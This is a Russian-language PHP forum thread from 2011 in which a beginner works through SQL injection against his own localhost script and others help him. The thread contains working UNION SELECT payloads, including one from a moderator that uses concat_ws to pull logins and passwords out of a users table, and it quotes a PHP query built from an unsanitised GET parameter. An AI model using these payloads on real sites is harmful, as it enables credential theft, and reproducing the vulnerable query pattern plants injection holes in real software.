PHP.SU

Программирование на PHP, MySQL и другие веб-технологии

PHP.SU Портал

Главная

Помощь

Поиск

Поиск Яндекс Вакансии

Пользователи

Здравствуйте, Гость

( Вход · Регистрация · Правила форума )

Забыли пароль?

SQL инекция

Форумы портала PHP.SU » PHP » Программирование на PHP » Вопросы новичков (Модераторы: OrmaJever, Саныч, Строитель)

Страниц (1): [1]

Без описания

Поиск в теме | Версия для печати

etoYA	Отправлено: 06 Ноября, 2011 - 07:45:14
Участник Покинул форум Сообщений всего: 1859 Дата рег-ции: Июль 2011 Откуда: Крым Помог: 21 раз(а)	Решил поигрался с инекцией, помогите разобратся с ошибками... Вот по этой статье https://forum[dot]antichat[dot]net/threa[dot][dot][dot]v43966-1-10[dot]html Вопросы: Почему там написано к примеру http://site[dot]ru/index.php?id=-1 'UNION SELECT 1,2,3,4,5,6,7,8,9,10,11-- все должно работать, а у меня не работает CODE (htmlphp): скопировать код в буфер обмена You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 1' at line 1 А если сделать так http://index.php?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11' , то все работает.... Потом, вот я типа подобрал кол-во столбцов, в моем случае 11, по коду выше выводит цифру 2. Но когда я пытаюсь ввести вместо этой цифры 2 login, то обламываюсь, типо CODE (html): скопировать код в буфер обмена Unknown column 'login' in 'field list' но ведь 100% есть колонка login и именно под номером 2 в базе. Инекцию делаю на этот запрос.... PHP: скопировать код в буфер обмена $id = $_GET['id']; $query = "SELECT * FROM `users` WHERE id='{$id}' LIMIT 1";

Мелкий	Отправлено: 06 Ноября, 2011 - 08:43:08
Активный участник Покинул форум Сообщений всего: 11926 Дата рег-ции: Июль 2009 Откуда: Россия, Санкт-Петербург Помог: 618 раз(а)	Чтобы проводить SQL-инъекции, надо понимать SQL. Читайте, как работает union, какие ограничения имеет. ----- PostgreSQL DBA

etoYA	Отправлено: 06 Ноября, 2011 - 09:00:28
Участник Покинул форум Сообщений всего: 1859 Дата рег-ции: Июль 2011 Откуда: Крым Помог: 21 раз(а)	Я не собераюсь их проводить, я лиж для интереса, для себя.... Зачем читать, если кто-то может сказать, и показать на практике... Все что знаю в пхп учил методом тыка, прочитал очень мало, считай самые основы (как обьявляются переменные, как делать цикл и.т.д). (Добавление) я хочу выполнить запрос http://localhost/index.php?id=-1'UNION SELECT 1,login,3,4,5,6,7,8,9,10,11' но ошибка: PHP: скопировать код в буфер обмена Unknown column 'login' in 'field list' если делаю так http://localhost/index.php?id=-1'UNION SELECT 1,login,3,4,5,6,7,8,9,10,11 FROM users' то ошибка: PHP: скопировать код в буфер обмена You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 1' at line 1 Обьясните в чем ошибка, и я пойму это... (Добавление) С синтаксисом разобрался, но есть одно но, и вот оно )).. http://localhost/scripts/profile[dot][dot][dot]?id=0'UNION SELECT 1,login,3,4,5,6,7,8,9,10,11 FROM users WHERE id='1 /* Логин выводит, но другие поля нет.....

LIME	Отправлено: 06 Ноября, 2011 - 10:20:36
Активный участник Покинул форум Сообщений всего: 10732 Дата рег-ции: Нояб. 2010 Помог: 322 раз(а)	etoYA пишет: Все что знаю в пхп учил методом тыка, прочитал очень мало, считай самые основы это работает только в начале...чтоб глубже знать придется почитать etoYA пишет: Зачем читать, если кто-то может сказать, и показать на практике после этих слов даже не стал читать вопрос дальше не стыдно заставлять людей тратить время на вас на то что сами прочесть можете

etoYA	Отправлено: 06 Ноября, 2011 - 10:23:17
Участник Покинул форум Сообщений всего: 1859 Дата рег-ции: Июль 2011 Откуда: Крым Помог: 21 раз(а)	Так дело не в этом, я попробовал прочитать, но не понял.... А на примере посмотрю и будет гораздо больший шанс понять. И я разве кого-то заставляю? P.S Это как и с ООП, читал, читал, а потом понял, что ничего не понял..... (Добавление) /close разобрался

OrmaJever	Отправлено: 06 Ноября, 2011 - 12:20:29
Активный участник Покинул форум Сообщений всего: 7540 Дата рег-ции: Янв. 2010 Откуда: Чернигов Помог: 299 раз(а)	etoYA пишет: http://localhost/scripts/profile[dot][dot][dot]?id=0'UNION SELECT 1,login,3,4,5,6,7,8,9,10,11 FROM users WHERE id='1 /* Логин выводит, но другие поля нет..... может так? CODE (htmlphp): скопировать код в буфер обмена http://localhost/scripts/profile...?id=0'UNION SELECT 1,concat_ws(0x3A,login,password),3,4,5,6,7,8,9,10,11 FROM users WHERE id='1 /* ----- Если вы хотя бы 3-4 раза не решите всё выкинуть и начать заново - вы явно что-то делаете не так.

etoYA	Отправлено: 06 Ноября, 2011 - 12:59:52
Участник Покинул форум Сообщений всего: 1859 Дата рег-ции: Июль 2011 Откуда: Крым Помог: 21 раз(а)	У меня получилось так, так выводит только 1 поле, т.е. допустим и логин и пароль не выводит, но зато выводит любое поле. PHP: скопировать код в буфер обмена http://localhost/scripts/profile.php?id=-1'UNION+SELECT+null,password,null,null,null,null,null,null,null,null,null+FROM users WHERE id='1 /* P.S то что хотел узнать, узна. LIME, метод тыка все же работает) (Добавление) Эм... Ваш вариант то что надо !! , обьясните пожалуйста, что значит contact_ws ? (Добавление) Разобрался с contact_ws

Поиск в теме | Версия для печати

Страниц (1): [1]

Сейчас эту тему просматривают: 0 (гостей: 0, зарегистрированных: 0)

« Вопросы новичков »

Все гости форума могут просматривать этот раздел.
Только зарегистрированные пользователи могут создавать новые темы в этом разделе.
Только зарегистрированные пользователи могут отвечать на сообщения в этом разделе.